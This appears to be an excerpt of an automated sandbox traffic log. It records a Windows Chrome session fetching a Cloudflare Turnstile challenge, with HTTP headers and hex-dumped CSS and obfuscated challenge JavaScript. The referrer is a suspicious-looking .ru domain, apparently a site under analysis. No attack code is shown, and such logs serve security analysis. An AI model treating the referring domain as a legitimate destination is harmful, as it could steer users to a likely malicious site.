                                                      2025-01-14 15:11:23 UTC797OUTGET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/ipdm4/0x4AAAAAAA3RtpCTVu7-vpVs/auto/fbE/normal/auto/ HTTP/1.1
                                                      Host: challenges.cloudflare.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      sec-ch-ua-platform: "Windows"
                                                      Upgrade-Insecure-Requests: 1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: navigate
                                                      Sec-Fetch-Dest: iframe
                                                      Referer: https://2ol.itectaxice.ru/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-14 15:11:23 UTC1362INHTTP/1.1 200 OK
                                                      Date: Tue, 14 Jan 2025 15:11:23 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Content-Length: 26635
                                                      Connection: close
                                                      cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                      permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                      content-security-policy: frame-src https://challenges.cloudflare.com/; base-uri 'self'
                                                      cross-origin-embedder-policy: require-corp
                                                      cross-origin-opener-policy: same-origin
                                                      cross-origin-resource-policy: cross-origin
                                                      origin-agent-cluster: ?1
                                                      accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                      critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                      referrer-policy: same-origin
                                                      document-policy: js-profiling
                                                      2025-01-14 15:11:23 UTC82INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 39 30 31 65 38 65 65 62 33 65 31 64 63 33 33 37 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                      Data Ascii: Server: cloudflareCF-RAY: 901e8eeb3e1dc337-EWRalt-svc: h3=":443"; ma=86400
                                                      2025-01-14 15:11:23 UTC1294INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                                                      Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                                                      2025-01-14 15:11:23 UTC1369INData Raw: 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65
                                                      Data Ascii: dding:0;width:100%}.main-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-size:14px;font-weight:400;-webkit-font-smoothing:antialiase
                                                      2025-01-14 15:11:23 UTC1369INData Raw: 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 69 72 65 77 6f 72 6b 20 2e 33 73 20 65 61 73 65 2d 6f 75 74 20 31 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 33 32 20 33 32 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 2d 38 7d 23 73 75 63 63 65 73 73 2d 74 65 78 74 7b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 20 31 73 20 66 6f 72 77 61 72 64 73 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 66 69 6c 6c 3a 23
                                                      Data Ascii: stroke:#038127;animation:firework .3s ease-out 1;stroke-width:1;stroke-dasharray:32 32;stroke-dashoffset:-8}#success-text{animation:fade-in 1s forwards;opacity:0}.success-circle{stroke-dashoffset:0;stroke-width:2;stroke-miterlimit:10;stroke:#038127;fill:#
                                                      2025-01-14 15:11:23 UTC1369INData Raw: 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 2e 74 68 65 6d 65 2d 64 61 72
                                                      Data Ascii: e-dark #challenge-overlay a,.theme-dark #challenge-overlay a:link,.theme-dark #challenge-overlay a:visited{color:#bbb}.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus,.theme-dark #challenge-error-text a:hover,.theme-dar
                                                      2025-01-14 15:11:23 UTC1369INData Raw: 32 30 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68
                                                      Data Ascii: 20}.theme-dark .logo-text{fill:#fff}.theme-dark #fr-helper-loop-link,.theme-dark #fr-helper-loop-link:link,.theme-dark #fr-helper-loop-link:visited{color:#bbb}.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:focus,.theme-dark #fr-h
                                                      2025-01-14 15:11:23 UTC1369INData Raw: 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33 30 33 3b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 61 6e 69 6d 61 74 69 6f 6e 3a 73 74 72 6f 6b 65 20 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 66 61 69 6c 75 72 65 2d 63 72 6f 73 73 7b 66 69 6c 6c 3a 23 66 66 66 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 62 6f 74 74 6f 6d 20 63 65 6e 74 65 72 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 2d 69 6e 2e 61 6e 69 6d 61 74 69 6f 6e 7b 30 25 7b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 73 74 72 6f 6b 65 3a 23 64 65 31
                                                      Data Ascii: ;stroke-dashoffset:166;stroke-width:2;stroke-miterlimit:10;stroke:#de1303;fill:#de1303;animation:stroke .6s cubic-bezier(.65,0,.45,1) forwards}.failure-cross{fill:#fff;transform-origin:bottom center}@keyframes fade-in.animation{0%{fill:#de1303;stroke:#de1
                                                      2025-01-14 15:11:23 UTC1369INData Raw: 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 66 6c 6f 77 3a 63 6f 6c 75 6d 6e 20 6e 6f 77 72 61 70 3b 67 61 70 3a 30 3b 68 65 69 67 68 74 3a 31 34 30 70 78 3b 70 61 64 64 69 6e 67 3a 31 32 70 78 20 30 3b 70 6c 61 63 65 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 6c 69 6e 6b 2d 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 33 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d
                                                      Data Ascii: ay:flex;flex-flow:column nowrap;gap:0;height:140px;padding:12px 0;place-content:space-between}.size-compact .link-spacer{margin-left:3px;margin-right:3px}.size-compact .cb-c{margin:0 12px;text-align:left}.size-compact .cb-container{margin:0 12px}.size-com
                                                      2025-01-14 15:11:23 UTC1369INData Raw: 69 7b 6c 65 66 74 3a 32 35 35 70 78 7d 2e 72 74 6c 20 23 66 72 2d 68 65 6c 70 65 72 2c 2e 72 74 6c 20 23 66 72 2d 6f 76 65 72 72 75 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 31 36 70 78 3b 77 69 64 74 68 3a 39 30 70 78 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 2c 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 61 6c 69 67 6e 2d 73 65 6c 66 3a 66 6c 65
                                                      Data Ascii: i{left:255px}.rtl #fr-helper,.rtl #fr-overrun{margin-left:.25em;margin-right:0}.rtl #branding{margin:0 0 0 16px;width:90px}.rtl #branding,.rtl.size-compact #branding{padding-left:0;padding-right:0;text-align:left}.rtl.size-compact #branding{align-self:fle
                                                      2025-01-14 15:11:23 UTC1369INData Raw: 6f 6c 6f 72 3a 23 31 36 36 33 37 39 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 2e 69 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 75 6e 73 70 75 6e 20 2e 63 69 72 63 6c 65 7b 61 6e 69 6d 61 74 69 6f 6e 3a 75 6e 73 70 69 6e 20 2e 37 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68
                                                      Data Ascii: olor:#166379;text-decoration:underline}#challenge-error-title a:link,#challenge-error-title a:visited{color:#232323}#challenge-error-title .i-wrapper{display:none}.unspun .circle{animation:unspin .7s cubic-bezier(.65,0,.45,1) forwards}.circle{stroke-width


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      9192.168.2.749729104.18.95.414433232C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-14 15:11:23 UTC727OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=901e8eeb3e1dc337&lang=auto HTTP/1.1
                                                      Host: challenges.cloudflare.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Sec-Fetch-Site: same-origin
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: script
                                                      Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/ipdm4/0x4AAAAAAA3RtpCTVu7-vpVs/auto/fbE/normal/auto/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-14 15:11:24 UTC331INHTTP/1.1 200 OK
                                                      Date: Tue, 14 Jan 2025 15:11:24 GMT
                                                      Content-Type: application/javascript; charset=UTF-8
                                                      Content-Length: 120728
                                                      Connection: close
                                                      cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                      Server: cloudflare
                                                      CF-RAY: 901e8eef28e84374-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      2025-01-14 15:11:24 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 55 52 61 4f 61 38 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 77 65 62 73 69 74 65 2d 74 65 72 6d 73 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 70 72 69 76 61 63 79 70 6f 6c 69 63 79 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70
                                                      Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.URaOa8={"metadata":{"challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.supported_browsers":"http
                                                      2025-01-14 15:11:24 UTC1369INData Raw: 73 73 66 75 6c 6c 79 25 32 30 73 75 62 6d 69 74 74 65 64 22 2c 22 74 65 73 74 69 6e 67 5f 6f 6e 6c 79 22 3a 22 54 65 73 74 69 6e 67 25 32 30 6f 6e 6c 79 2e 22 2c 22 69 6e 76 61 6c 69 64 5f 73 69 74 65 6b 65 79 22 3a 22 49 6e 76 61 6c 69 64 25 32 30 73 69 74 65 6b 65 79 2e 25 32 30 43 6f 6e 74 61 63 74 25 32 30 74 68 65 25 32 30 53 69 74 65 25 32 30 41 64 6d 69 6e 69 73 74 72 61 74 6f 72 25 32 30 69 66 25 32 30 74 68 69 73 25 32 30 70 72 6f 62 6c 65 6d 25 32 30 70 65 72 73 69 73 74 73 2e 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 61 69 6c 75 72 65 22 3a 22 45 72 72 6f 72 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 72 65 66 72 65 73 68 22 3a 22 52 65 66 72 65 73 68 22 2c 22 6f 75 74 64 61 74 65 64 5f 62 72 6f 77 73 65 72 22 3a 22 59 6f 75 72 25 32 30 62 72 6f 77
                                                      Data Ascii: ssfully%20submitted","testing_only":"Testing%20only.","invalid_sitekey":"Invalid%20sitekey.%20Contact%20the%20Site%20Administrator%20if%20this%20problem%20persists.","turnstile_failure":"Error","turnstile_refresh":"Refresh","outdated_browser":"Your%20brow
                                                      2025-01-14 15:11:24 UTC1369INData Raw: 2c 67 62 2c 67 6d 2c 67 71 2c 67 72 2c 67 73 2c 67 77 2c 67 78 2c 67 45 2c 65 54 2c 65 55 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 2d 70 61 72 73 65 49 6e 74 28 67 49 28 39 34 35 29 29 2f 31 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 32 38 30 29 29 2f 32 2b 70 61 72 73 65 49 6e 74 28 67 49 28 38 38 39 29 29 2f 33 2b 70 61 72 73 65 49 6e 74 28 67 49 28 35 39 36 29 29 2f 34 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 35 31 32 29 29 2f 35 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 31 36 35 29 29 2f 36 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 34 31 37 29 29 2f 37 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 31 37 33
                                                      Data Ascii: ,gb,gm,gq,gr,gs,gw,gx,gE,eT,eU){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=-parseInt(gI(945))/1+-parseInt(gI(1280))/2+parseInt(gI(889))/3+parseInt(gI(596))/4+parseInt(gI(1512))/5+parseInt(gI(1165))/6+-parseInt(gI(1417))/7*(parseInt(gI(173
                                                      2025-01-14 15:11:24 UTC1369INData Raw: 72 6e 20 68 3c 3c 69 7d 2c 27 65 4f 51 67 77 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 26 68 7d 2c 27 59 64 71 57 77 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 7c 68 7d 2c 27 78 61 51 71 79 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3e 69 7d 2c 27 44 71 77 7a 69 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 41 67 4a 69 64 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 4b 42 4a 49 56 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 75 69 4c 53 61 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 7c 69 7d 2c 27 50 69 4f 65 70 27
                                                      Data Ascii: rn h<<i},'eOQgw':function(h,i){return i&h},'YdqWw':function(h,i){return i|h},'xaQqy':function(h,i){return h>i},'Dqwzi':function(h,i){return h==i},'AgJid':function(h,i){return h-i},'KBJIV':function(h,i){return h<i},'uiLSa':function(h,i){return h|i},'PiOep'
                                                      2025-01-14 15:11:24 UTC1369INData Raw: 66 28 64 5b 67 5a 28 31 32 34 38 29 5d 28 67 5a 28 31 37 35 34 29 2c 67 5a 28 31 31 31 30 29 29 29 74 68 69 73 2e 68 5b 42 5b 67 5a 28 36 38 35 29 5d 28 74 68 69 73 2e 68 5b 42 5b 67 5a 28 36 38 35 29 5d 28 31 36 38 2c 74 68 69 73 2e 67 29 5d 5b 33 5d 5e 33 36 2b 74 68 69 73 2e 68 5b 74 68 69 73 2e 67 5e 31 36 38 2e 33 34 5d 5b 31 5d 5b 67 5a 28 31 33 35 36 29 5d 28 74 68 69 73 2e 68 5b 74 68 69 73 2e 67 5e 31 36 38 2e 34 36 5d 5b 30 5d 2b 2b 29 26 32 35 35 2e 33 34 5e 32 33 32 2c 74 68 69 73 2e 67 29 5d 3d 7b 7d 3b 65 6c 73 65 20 69 66 28 4e 3d 6a 5b 67 5a 28 34 33 38 29 5d 28 4d 29 2c 4f 62 6a 65 63 74 5b 67 5a 28 31 38 35 30 29 5d 5b 67 5a 28 31 38 38 35 29 5d 5b 67 5a 28 34 34 32 29 5d 28 44 2c 4e 29 7c 7c 28 44 5b 4e 5d 3d 48 2b 2b 2c 45 5b 4e 5d 3d
                                                      Data Ascii: f(d[gZ(1248)](gZ(1754),gZ(1110)))this.h[B[gZ(685)](this.h[B[gZ(685)](168,this.g)][3]^36+this.h[this.g^168.34][1][gZ(1356)](this.h[this.g^168.46][0]++)&255.34^232,this.g)]={};else if(N=j[gZ(438)](M),Object[gZ(1850)][gZ(1885)][gZ(442)](D,N)||(D[N]=H++,E[N]=
                                                      2025-01-14 15:11:24 UTC1369INData Raw: 6f 72 28 52 3d 46 5b 67 5a 28 31 33 35 36 29 5d 28 30 29 2c 43 3d 30 3b 64 5b 67 5a 28 37 31 35 29 5d 28 38 2c 43 29 3b 4b 3d 4b 3c 3c 31 2e 34 31 7c 52 26 31 2e 31 37 2c 64 5b 67 5a 28 39 32 35 29 5d 28 4c 2c 64 5b 67 5a 28 31 33 31 35 29 5d 28 6f 2c 31 29 29 3f 28 4c 3d 30 2c 4a 5b 67 5a 28 31 37 36 35 29 5d 28 73 28 4b 29 29 2c 4b 3d 30 29 3a 4c 2b 2b 2c 52 3e 3e 3d 31 2c 43 2b 2b 29 3b 7d 65 6c 73 65 7b 66 6f 72 28 52 3d 31 2c 43 3d 30 3b 64 5b 67 5a 28 31 35 30 36 29 5d 28 43 2c 49 29 3b 4b 3d 64 5b 67 5a 28 36 35 36 29 5d 28 4b 3c 3c 31 2e 37 37 2c 52 29 2c 4c 3d 3d 6f 2d 31 3f 28 4c 3d 30 2c 4a 5b 67 5a 28 31 37 36 35 29 5d 28 64 5b 67 5a 28 31 39 30 39 29 5d 28 73 2c 4b 29 29 2c 4b 3d 30 29 3a 4c 2b 2b 2c 52 3d 30 2c 43 2b 2b 29 3b 66 6f 72 28 52
                                                      Data Ascii: or(R=F[gZ(1356)](0),C=0;d[gZ(715)](8,C);K=K<<1.41|R&1.17,d[gZ(925)](L,d[gZ(1315)](o,1))?(L=0,J[gZ(1765)](s(K)),K=0):L++,R>>=1,C++);}else{for(R=1,C=0;d[gZ(1506)](C,I);K=d[gZ(656)](K<<1.77,R),L==o-1?(L=0,J[gZ(1765)](d[gZ(1909)](s,K)),K=0):L++,R=0,C++);for(R
                                                      2025-01-14 15:11:24 UTC1369INData Raw: 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 68 33 28 38 37 34 29 5d 28 32 2c 38 29 2c 46 3d 31 3b 46 21 3d 4b 3b 4c 3d 48 26 47 2c 48 3e 3e 3d 31 2c 30 3d 3d 48 26 26 28 48 3d 6a 2c 47 3d 64 5b 68 33 28 31 33 33 39 29 5d 28 6f 2c 49 2b 2b 29 29 2c 4a 7c 3d 28 64 5b 68 33 28 31 35 30 36 29 5d 28 30 2c 4c 29 3f 31 3a 30 29 2a 46 2c 46 3c 3c 3d 31 29 3b 4d 3d 64 5b 68 33 28 31 39 30 39 29 5d 28 65 2c 4a 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 31 3a 66 6f 72 28 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 68 33 28 38 37 34 29 5d 28 32 2c 31 36 29 2c 46 3d 31 3b 4b 21 3d 46 3b 4c 3d 47 26 48 2c 48 3e 3e 3d 31 2c 64 5b 68 33 28 39 32 38 29 5d 28 30 2c 48 29 26 26 28 48 3d 6a 2c 47 3d 64 5b 68 33 28 36 33 35 29 5d 28 6f 2c 49 2b 2b 29 29 2c 4a 7c 3d 28 64 5b 68 33 28 31 36 39 35 29 5d
